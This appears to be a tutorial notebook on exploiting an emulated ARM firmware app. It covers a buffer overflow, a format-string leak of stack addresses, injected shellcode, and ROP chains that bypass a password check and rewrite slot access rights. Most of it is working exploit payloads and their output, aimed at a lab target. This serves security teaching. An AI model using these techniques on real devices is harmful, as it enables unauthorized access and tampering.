<a href="https://colab.research.google.com/github/Jubicod/wsf/blob/main/tutorial1/help/d_buffer_overflow.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Exploiting a **buffer overflow**

In [1]:
!git clone https://github.com/Jubicod/wsf.git
%run wsf/tutorial1/install.ipynb

Cloning into 'wsf'...
remote: Enumerating objects: 254, done.
remote: Counting objects: 100% (254/254), done.
remote: Compressing objects: 100% (177/177), done.
remote: Total 254 (delta 102), reused 187 (delta 69), pack-reused 0
Receiving objects: 100% (254/254), 177.87 KiB | 1.43 MiB/s, done.
Resolving deltas: 100% (102/102), done.
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  binutils-arm-none-eabi libnewlib-arm-none-eabi libnewlib-dev libstdc++-arm-none-eabi-dev
  libstdc++-arm-none-eabi-newlib
Suggested packages:
  libnewlib-doc
The following NEW packages will be installed:
  binutils-arm-none-eabi gcc-arm-none-eabi libnewlib-arm-none-eabi libnewlib-dev
  libstdc++-arm-none-eabi-dev libstdc++-arm-none-eabi-newlib
0 upgraded, 6 newly installed, 0 to remove and 45 not upgraded.
Need to get 442 MB of archives.
After this operation, 2,575 MB of additional disk space will be used.
G

In [2]:
app = App()
# to find a buffer overflow, we just send a lot of bytes on different commands and see what happens
app.send('UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')

ready...
UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
error
------CRASHED--------
Unhandled CPU exception (UC_ERR_EXCEPTION)
PC = 0x41414140


965

In [20]:
# the crash is probably the symptom of a buffer overflow. the crash dump seems to indicate an overflow of the program counter (return address on stack)
# is it only on command U ?
# in fact we can try a lot of commands, all crash, it is not related to a command as shown below
app.reset()
app.send('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')

ready...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Unhandled CPU exception (UC_ERR_EXCEPTION)
PC = 0x41414140


596

In [21]:
# since we have this very convenient crash dump, let's find out where is the return address to overwrite
app.reset()
app.send('0000111122223333444455556666777788889999AAAABBBBCCCCDDDDEEEE')

ready...
0000111122223333444455556666777788889999AAAABBBBCCCCDDDDEEEE
Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
PC = 0x34343434


590

In [22]:
# PC is 0x34343434 ('4444'), so return address is on the 5th 32-bits word of our buffer
# how to go further ?
# here we assume we don't have yet the code binary, but we know another bug exists: a format string
app.reset()
app.send('%p-%p-%p-%p-%p-%p-%p-%p-%p')

ready...
20004fe0-20000a28-0-0-0-0-0-0-8000267
Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
PC = 0x70252d70


386

In [6]:
# we have to very different addresses in RAM. one is probably on the stack, the other one on globals
# the first one is probably the stack, as it is very often on a top address
# let's try to fill our buffer with infinite loops (opcode e7fe)
# and jump to this stack address (with bit 0 set to 1 to indicate ARM Thumb code)
app.reset()
app.send(0xe7fee7fe, 0xe7fee7fe, 0xe7fee7fe, 0xe7fee7fe, 0x20004fe1)

ready...
þçþçþçþçþçþçþçþçáO
Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error


'timeout'

In [8]:
# it worked (1s timeout). it was the address of our buffer
# and RAM is executable on this device
# now we can just insert our binary code in the buffer
# but what if the RAM was not executable ?
app = App(RAM_is_executable=False) # power-up the device with RAM not executable
app.reset()
app.send(0xe7fee7fe, 0xe7fee7fe, 0xe7fee7fe, 0xe7fee7fe, 0x20004fe1)
# it does not work anymore !!!

ready...
þçþçþçþçþçþçþçþçáO
Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Fetch from non-executable memory (UC_ERR_FETCH_PROT)
PC = 0x20004fe0


350

# Code Reuse, white box hacking

we can try code reuse techniques, but for these, it's much easier with the binary.

Let's assume we dumped it (thanks to the format string bug for instance) and reversed it.

The disassembly file is in app/app.txt

Now let's try to unlock the device. Here is the slot_unlock function

```
void slot_unlock(unsigned char* pw, int size)
{
 8000384:	b508      	push	{r3, lr}
 8000386:	4601      	mov	r1, r0
 8000388:	2204      	movs	r2, #4
 800038a:	4807      	ldr	r0, [pc, #28]	; (80003a8 <slot_unlock+0x24>)
 800038c:	f000 f950 	bl	8000630 <memcmp>
 8000390:	b920      	cbnz	r0, 800039c <slot_unlock+0x18>
  info.locked = 0;
 8000392:	4b06      	ldr	r3, [pc, #24]	; (80003ac <slot_unlock+0x28>)
 8000394:	2200      	movs	r2, #0
 8000396:	701a      	strb	r2, [r3, #0]
	info.error = 0;
 8000398:	705a      	strb	r2, [r3, #1]
 800039a:	bd08      	pop	{r3, pc}
```
We can jump after PIN is verified, to 0x08000392.

But for this to be useful we need to recover from the crash, to accept read and write commands for instance. The function returns with POP {R3,PC}, so we could return in the main loop (in main), just before the "ready" print (0x08000286):

```
int main(int argc, char**argv)
{
 8000284:	b508      	push	{r3, lr}
        printf("ready...\n");
 8000286:	4803      	ldr	r0, [pc, #12]	; (8000294 <main+0x10>)
 8000288:	f000 fabc 	bl	8000804 <puts>
	while(1)
	{
		receive_and_process_command();
 800028c:	f7ff ffe5 	bl	800025a <receive_and_process_command>
	while(1)
 8000290:	e7fc      	b.n	800028c <main+0x8>
 8000292:	bf00      	nop
 8000294:	08007f58 	.word	0x08007f58
```




In [24]:
!grep 'void slot_unlock' wsf/tutorial1/app/app.txt -A 20

void slot_unlock(unsigned char* pw, int size)
{
 8000384:	b508      	push	{r3, lr}
 8000386:	4601      	mov	r1, r0
  if(memcmp(info.password, pw, sizeof(info.password)) == 0)
 8000388:	2204      	movs	r2, #4
 800038a:	4807      	ldr	r0, [pc, #28]	; (80003a8 <slot_unlock+0x24>)
 800038c:	f000 f950 	bl	8000630 <memcmp>
 8000390:	b920      	cbnz	r0, 800039c <slot_unlock+0x18>
  info.locked = 0;
 8000392:	4b06      	ldr	r3, [pc, #24]	; (80003ac <slot_unlock+0x28>)
 8000394:	2200      	movs	r2, #0
 8000396:	701a      	strb	r2, [r3, #0]
	info.error = 0;
 8000398:	705a      	strb	r2, [r3, #1]
  else
  {
    lock();
    set_error();
  }
}


In [28]:
!grep 'int main' wsf/tutorial1/app/app.txt -A 12

int main(int argc, char**argv)
{
 8000284:	b508      	push	{r3, lr}
        printf("ready...\n");
 8000286:	4803      	ldr	r0, [pc, #12]	; (8000294 <main+0x10>)
 8000288:	f000 fabc 	bl	8000804 <puts>
	while(1)
	{
		receive_and_process_command();
 800028c:	f7ff ffe5 	bl	800025a <receive_and_process_command>
	while(1)
 8000290:	e7fc      	b.n	800028c <main+0x8>
 8000292:	bf00      	nop


In [12]:
# let's do it
app.reset()
app.send('0000111122223333', # don't care
         0x08000393, # return to slot_unlock
         'AAAA', # POP R3 don't care
         0x08000287, # POP PC : return to main loop
         )
app.send('S')
# device is unlocked and still alive !!!!

ready...
0000111122223333
Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
ready...
S
device unlocked
0  RW-L
1  RW-L
2  RW-L
3  R--L
4  R-IL
5  RW--
6  R---
7  ----
ok


242

In [67]:
# now let's try to find a way to write anywhere in the memory, to modify all slot contents, or their access rights
# ideally we need a write byte gadget
!python wsf/tutorial1/scripts/gadget.py -d 2 strb


 8000168:	7023      	strb	r3, [r4, #0]
 800016a:	bd10      	pop	{r4, pc}

 800037c:	7183      	strb	r3, [r0, #6]
 800037e:	bd10      	pop	{r4, pc}

 8004dae:	701e      	strb	r6, [r3, #0]
 8004db0:	bd70      	pop	{r4, r5, r6, pc}

 8004dc8:	701e      	strb	r6, [r3, #0]
 8004dca:	bd70      	pop	{r4, r5, r6, pc}

 8004e08:	701d      	strb	r5, [r3, #0]
 8004e0a:	bd70      	pop	{r4, r5, r6, pc}

 8004e24:	701d      	strb	r5, [r3, #0]
 8004e26:	bd70      	pop	{r4, r5, r6, pc}



In [68]:
# the strb r5, r3 looks promising (8004e24)
# we need a gadget to control r3 and r5:
!python wsf/tutorial1/scripts/gadget.py r3 r5
# there are a lot (800031a would work)

 8000258:	bdf8      	pop	{r3, r4, r5, r6, r7, pc}

 800031a:	bd38      	pop	{r3, r4, r5, pc}

 8001e0c:	bd38      	pop	{r3, r4, r5, pc}

 8001e2c:	bd38      	pop	{r3, r4, r5, pc}

 8001ea6:	bd38      	pop	{r3, r4, r5, pc}

 8003048:	bdf8      	pop	{r3, r4, r5, r6, r7, pc}

 8003084:	bdf8      	pop	{r3, r4, r5, r6, r7, pc}

 80030b8:	bdf8      	pop	{r3, r4, r5, r6, r7, pc}

 80030d0:	bdf8      	pop	{r3, r4, r5, r6, r7, pc}

 80030d6:	bdf8      	pop	{r3, r4, r5, r6, r7, pc}

 80030ea:	bd38      	pop	{r3, r4, r5, pc}

 800311a:	bd38      	pop	{r3, r4, r5, pc}

 80033ae:	bdf8      	pop	{r3, r4, r5, r6, r7, pc}

 80033d6:	bdf8      	pop	{r3, r4, r5, r6, r7, pc}

 800399e:	bd38      	pop	{r3, r4, r5, pc}

 80039dc:	bd38      	pop	{r3, r4, r5, pc}

 8004338:	bd38      	pop	{r3, r4, r5, pc}

 800434c:	bd38      	pop	{r3, r4, r5, pc}

 8004588:	bd38      	pop	{r3, r4, r5, pc}

 800523c:	bd38      	pop	{r3, r4, r5, pc}

 8005248:	bd38      	pop	{r3, r4, r5, pc}

 8005272:	bd38      	pop	{r3, r4,

In [66]:
# the difficult part is to exfiltrate the value
# printf is not convenient as data should be in r1
# we could try to write r0 in the slot 0
!python wsf/tutorial1/scripts/gadget.py -d 3 strb


 8000166:	2301      	movs	r3, #1
 8000168:	7023      	strb	r3, [r4, #0]
 800016a:	bd10      	pop	{r4, pc}

 800037a:	3301      	adds	r3, #1
 800037c:	7183      	strb	r3, [r0, #6]
 800037e:	bd10      	pop	{r4, pc}

 80042fe:	f803 2f01 	strb.w	r2, [r3, #1]!
 8004302:	d1f9      	bne.n	80042f8 <memmove+0xdc>
 8004304:	bd70      	pop	{r4, r5, r6, pc}

 8004dac:	6022      	str	r2, [r4, #0]
 8004dae:	701e      	strb	r6, [r3, #0]
 8004db0:	bd70      	pop	{r4, r5, r6, pc}

 8004dc6:	6022      	str	r2, [r4, #0]
 8004dc8:	701e      	strb	r6, [r3, #0]
 8004dca:	bd70      	pop	{r4, r5, r6, pc}

 8004e06:	6022      	str	r2, [r4, #0]
 8004e08:	701d      	strb	r5, [r3, #0]
 8004e0a:	bd70      	pop	{r4, r5, r6, pc}

 8004e22:	6022      	str	r2, [r4, #0]
 8004e24:	701d      	strb	r5, [r3, #0]
 8004e26:	bd70      	pop	{r4, r5, r6, pc}



In [74]:
# so to summarize
# 0x0800031b:	pop	r3,r4,r5,pc}
# 0x08004e25 : strb r5, [r3]; pop r4,r5,r6,pc
# 0x08000287 : main loop
# address of slot 0: 0x2000000a
# address of slot i: 0x2000000a + i*2
# address of slot i access rights: 0x2000000a + i*2 + 1
app = App()
slot=7
app.send('0000111122223333', # don't care
         0x0800031b, # pc: jump to pop r3,r4,r5,pc
         0x2000000a+slot*2+1, # r3 address to write to
         'AAAA', # r4 don't care
         0xf, # r5 byte to write (all access)
         0x08004e25, # pc: jump to strb r5, [r3]; pop r4,r5,r6,pc
         'AAAA', # r4 don't care
         'AAAA', # r5 don't care
         'AAAA', # r6 don't care
         0x08000287 # main loop
         )
app.send('s')
app.send('r7')

ready...
0000111122223333
Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
ready...
s
device locked
0  RW-L
1  RW-L
2  RW-L
3  R--L
4  R-IL
5  RW--
6  R---
7  RWIL
ok
r7
0
ok


99